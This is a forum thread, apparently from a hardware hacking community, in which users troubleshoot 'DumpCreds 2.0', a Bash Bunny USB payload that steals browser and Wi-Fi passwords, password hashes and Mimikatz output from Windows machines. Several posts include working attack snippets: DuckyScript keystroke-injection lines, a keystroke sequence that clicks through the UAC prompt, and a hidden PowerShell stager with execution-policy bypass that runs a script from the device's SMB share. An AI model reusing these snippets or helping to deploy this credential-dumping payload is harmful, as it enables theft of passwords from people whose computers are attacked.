Jump to content

[PAYLOAD] DrumpCreds 2.0 ( SMB, w/o Internet, w/o USB Storage )

qdba

By qdba
in Payloads

 Share

Recommended Posts

qdba Newbie

qdba

Posted
  • Author
Posted (edited)

New Version 2.0.2 

Changelog: 

  • Paralellize Powersploit script, so the payload ist faster.
  • Universal Payload. The payload works no matter if there is a UAC prompt or a credentials prompt.. There is no kind of exploitation. You will not get admin rights if you haven't it before. But without admin rights WifiDump, BrowserDump, Computerinformation works fine. Only for Hashdump and M1m1k@tz you ned admin rights.

Install:  

Copy all files to your switch directory. Don't forget the PS Folder. 

Downlod: 

See first Post

Edited by qdba
Link to comment
Share on other sites
  • Replies 62
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

qdba
qdba

DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox)

qdba
qdba

- Can you ping 172.16.64.1 - Try the attached payload.txt. If it goes to red,  smbserver.py is missing. If not, ssh to bunny while purple LED blinks slow.    1. enter command at Termina

qdba
qdba

Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed in

qdba Newbie

qdba

Posted
  • Author
Posted
36 minutes ago, illwill said:

i havent tested yours but with chromecreds i had an issue with it truncating the urls with... if they were too long. this is how i solved it

Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250

 

Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)

 

Link to comment
Share on other sites
Decoy Newbie

Decoy

Posted
Posted
Just now, Hectortxz said:

I Tried It On Windows 8.1 And Purple Kept Blinking Slow For 5 Minutes. I'm Doing Something Wrong

Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?

Link to comment
Share on other sites
Hectortxz Newbie

Hectortxz

Posted
Posted
47 minutes ago, Decoy said:

Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?

Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted (edited)
9 hours ago, illwill said:

are your chrome results truncated ?

In Version 2.0.2 it works. In older versions they are truncated.

Edited by qdba
Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted (edited)
3 hours ago, Hectortxz said:

Its A Slow Blink. I Think Its My IP I Set It To 172.16.64.1 And 255-255-255-0 But It'll Turn Red When I Try The Payload, But If My Computer Tries To Automatically Get The IP It Blinks A Slow Purple For 5 Minutes

If you set the IP manually, The var TARGET_IP will not be set by bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working at a extended version for bunny_helpers.sh. Its not an Error of payload. 

If the LED blinks slow Purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working.

If yes... does it work when you start the script main.ps1 manually ( enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell.

Be sure you have the latest Files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.  

Edited by qdba
Link to comment
Share on other sites
jafahulo Newbie

jafahulo

Posted
Posted
11 hours ago, Hectortxz said:

Change It In The Payload ?

yes it should look something like this: 

# HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B
ATTACKMODE HID

Q SET_LANGUAGE US

 

and: 

# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
Q DELAY 1000
Q ALT y
Q DELAY 500
Q ENTER

 

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted

After a Firmware reset this afternoon, I run in trouble with smbserver.py. He didn't start. The Purple LED blinks slow.

Affter some tests I realized that afer run of the tools_installer the things was fine installed, but smbserver.py had ^M at the end of every line.
I removed it in vi with :1,$s/<CTRL-v><CTRL-M>//g

or wth the commands

------------------------------------------------

cd /pentest/impacket/examples

cp smbserver.py smbserver.py.sik

cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py

-----------------------------------------------------------

Now it works again.

 

Link to comment
Share on other sites
Hectortxz Newbie

Hectortxz

Posted
Posted
20 hours ago, Decoy said:

Yes, you need to change the keyboard layout to US if you after in the US, and change the UAC bypass key to "y".

I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink.

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted
1 hour ago, Hectortxz said:

I Changed The Payload For The US And I Pinged My IP To 172.16.64.1 And It Came Back Good. It Just Doesn't Pass The Slow Purple Blink.

Can you connect to \\172.16.64.1\e from explorer?

Is the smbserver.py running ( ssh to Bunny and do a ps -ef |grep smb ) If not see my post above. there is an error in the Impacket installed by tools_installer

 

Link to comment
Share on other sites
Altao Newbie

Altao

Posted
Posted

Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem

i can connect to \\172.16.64.1\e

if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works

if i do ps -ef |grep smb

root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root      1393   967  0 16:06 pts/0    00:00:00 grep smb

and i have a german keyboard

what my mistake

Greetings

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted
16 minutes ago, Altao said:

Hi can you post a working smbserver.py i tried nearly everything a Firmware reset your command the slow purple blink is still the problem

i can connect to \\172.16.64.1\e

if i run powershell -exec bypass \\172.16.64.1\e\main.ps1 it works

if i do ps -ef |grep smb

root       693     1  3 16:00 ?        00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
root      1393   967  0 16:06 pts/0    00:00:00 grep smb

and i have a german keyboard

what my mistake

Greetings

Are you using Version 2.0.2
Is there an UAC Prompt or a Credential prompt?

Guess there is a timing Problem. So the main.ps1 script will not start. 


LED R G
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500    <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
Q DELAY 1000
Q ENTER
 

Does the main.ps1 script fire up right. Can you see the command in Console?

Take care that no other Windows is open on the screen. Works best on pure Desktop.

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted
7 minutes ago, Altao said:

Hi i use DumpCreds 2.0.2 Build 1003 

I tried your delay still the same problem.

i see -.+.!

wifi-creds.....

and the rest

and at last very short a red sript part but too short.

Greetings

 

 

 

OK helps a lot. So the handshake Ting works fine.

Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen.  

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted
4 hours ago, qdba said:

OK helps a lot. So the handshake Ting works fine.

Now the error message would be helpfull. On very fast fanishing error messages I do a trick. I make a video with the smartphone and forward slow manually until the error messages is seen.  

Just modify the script so have verbose or debug option and then have it fire off with debug switch.  For part that may have errors I usually wrap it in a try  on catch I log it to a local file if debug flag is used.  Helps during testing.  Better yet, do not run the script hidden. go to cmd, run his stager without the windowstyle option.  Or launch powershell and take the code after the -C in his powershell command and run it straight.  You should then have the PS session still open to scroll back through the errors.

 

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
  • Author
Posted

DumpCreds_2.1 New Version

Changelog

  • Complete new payload.txt code for BashBunny 1.1
  • Added a lot of debug code into the payload
    For Debugging create a File "DEBUG" to payload Folder. You got the debug log in \loot\Dumpcreds_2.1
  • Impacket.deb included for easy impacket installation
  • Some Ducky languages included (from DuckyInstall Payload)

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...